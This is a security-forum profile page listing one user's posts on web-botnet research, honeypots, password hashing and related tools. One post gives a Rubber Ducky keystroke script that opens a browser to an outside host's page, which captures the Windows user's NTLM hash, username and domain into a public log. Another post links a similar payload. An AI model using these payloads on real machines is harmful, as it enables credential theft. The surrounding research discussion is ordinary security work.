Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

Contact Methods

  • Website URL

Profile Information

  • Gender
  • Location
    Upstate New York
  • Interests
    I like my adapters in promiscuous mode if you what I mean ;)

Recent Profile Visitors

3,216 profile views

bwall's Achievements


Newbie (1/14)

  1. I had posted a payload a while back here on the forums that made the current user attempt to send an NTLMv2 auth to a remote IP (kind of different but I figured it warranted a mention). The limitation would be that it only affects the current user and requires a remote server to grab the auth (https://github.com/bwall/BAMF/blob/master/IntegrationQueue/static/cifstrap.py
  2. Snort only does detection on a packet by packet basis(correct me if I'm wrong, its been a while), so I don't believe snort would work as a total solution, as different attacks can easily span more than one packet. I was thinking of writing an Apache/Nginx module that sent attack data, so at least that would handle vhosts. I'm still working on this though. Currently, I'm trying to find a good way to setup an easy to use SDK from various languages so attacks can be reported from plugins/IDSs/etc. I also have a few less public things as well, at least until I can get a good idea of how well they work out.
  3. Yes, as DigiP said, I have filtering methods in place and I confirm information before I merge it into a local database I'm using to conduct the research on. There is also value in gathering information on those who are trying to submit spam/erroneous information. If you are looking for the Attack Scanner link, its in DigiP's signature, but in the case that changes at some point, here it is: http://www.attack-scanner.com/ If you are looking to develop an application/honeypot that will submit information to the API, feel free to contact me about implementation code in the language you are using.
  4. For the past few months(even maybe half a year now), along with DigiP, I have been researching web botnets, attacks they use, and common web shells they use. As a result, we have been able to release products to help protect against their spreading attacks and released 2 exploits for taking down the botnets themselves. The issue we have run into is that we have a limited amount of data/honey pots to work with. While we do have some collecting data, the data being gathered is somewhat limited. This is why I started the Attack-Analysis project. This project is designed to host a web API to post general attack information to when your webserver or honey pot receives an attack. This attack data is then pumped into a database, which is later analyzed by me to come up with details on these botnets, including exploits to take them down or in a slightly less ethical manor, take control of them. The details for the API are here: https://defense.ballastsecurity.net/wiki/index.php/Attack_Analysis Another place that you can help is with the payload decoder, which archives and decodes RFI payloads. The details for that are here: https://defense.ballastsecurity.net/wiki/index.php/RFI_Payload_Decoder and the results are currently hosted here along with the archived sources: https://defense.ballastsecurity.net/decoding/index.php The exploits: http://www.exploit-db.com/exploits/24883/ http://www.exploit-db.com/exploits/20168/ So if you want to help the good fight, please help out anyway you can. I try to make everything I release as open source as possible, but somethings need to stay a bit in the dark for security's sake, because I know botters follow my work.
  5. Can't really account for collisions, especially since it depends on what hashing method is employed by the web server. Also, different salts can rule out predictable collisions. if hash(pass1 + salt1) == hash(pass2 + salt1): hash(pass1 + salt2) != hash(pass2 + salt2)
  6. For everyone who uses a password manager, this might be a good extension for you to try. After doing a bit of research, I found that most hash cracking software can not crack passwords over 125 characters. While a 125 character password is extremely strong, 126 makes it so hash cracking software must be modified(which can be a pain as I found after helping patch John the Ripper). I was sad to see that password managers don't have the option to create passwords that large(for the most part), so I decided to create a simple Chrome extension to generate passwords at a variable length, with focus on massive passwords. Here's a link: https://chrome.google.com/webstore/detail/bwallhatestwits-password/gocfgmeinifgmkhjkdmfjolfmpfpfnbg Feel free to send any questions/comments my way.
  7. Looks like it might be a DPAPI blob, which means without the master key, user's password and possible entropy, you can't decrypt it without being logged in as that user. http://msdn.microsoft.com/en-us/library/ms995355.aspx
  8. For a fun way to use the "poor man's VPN" as it was described earlier, sshuttle is a random tool I found that does a fairly good job of setting up VPN over SSH without requiring root on the remote machine. I don't develop the tool, but its nice to use.
  9. Maybe it was deleted for bad mouthing Anonymous. I hear some people are afraid of getting DDoS'd by them. Yet they aren't terrorists somehow. ;)
  10. I got a Rubber Ducky for xmas, and figured I would start with a simple script before I went into encoded binaries. So as far as useful, I figured I would a testing file I have up on my server which tricks IE into trying to connect to a fake CIFS server, sending a double salted hash of the user's password on the Windows box, along with the username and domain. This information is then dumped to a web readable file. DELAY 1000 CONTROL ESCAPE DELAY 50 STRING iexplore.exe http://firebwall.com/test.html ENTER DELAY 2000 ALT f STRING x REM http://firebwall.com/hashlog.txt will show the exchange that you can run password cracking on I have a custom CIFS server up, but there is a metasploit module you can run on your own. If you do not wish to make your IP, password hash, username and domain publicly available, do not go to test.html with anything other than wget or curl.
  11. I read the topic to this and was immediately interested. I am a big fan of hunting botters. Some of them make it really easy too. The number one thing you want to do is honey pot and sandbox anything you can get your hands on from the botnet. Get as much intelligence from them as you can, because they always do thoughtless things like hardcode a password into the bots, or connect to a C&C that isn't public. This topic also reminded me of a video I put out through Ballast Security a little while back, about exploiting a pBot RCE to destroy a whole botnet. DigiP did the music for this one I'm pretty sure.
  12. I'm sorry, but flooders are lame, flooders that don't use PCAP for packet crafting are even worse. Not only is your performance going to drop off a cliff after 65535 "connections" are used, its going to drop off even more when you hit the file descriptor limit on the OS. 20 lines of python using pcap and threads could trounce this, but it'll be a cold day in hell when you see me write a DoS tool. This is a prime example of an Anonymous member. So unbelievably ignorant to even the attack methods they use as their primary attack, horrible coding skills, then thinks hes going to get kudos for posting about DoS tools in a SECURITY thread?
  13. You can use something like http://firebwall.com to stop ARP poisoning attacks. I develop it with a some other folk as well. It won't protect you outside of your local network.
  14. Decided to make this into a blog post so I don't have to explain the idea/challenge in a bunch of places. I have an even better version hidden away in my "software lab". https://www.ballastsecurity.net/php/first-of-many-encrypted-php-shell-challenges/
  • Create New...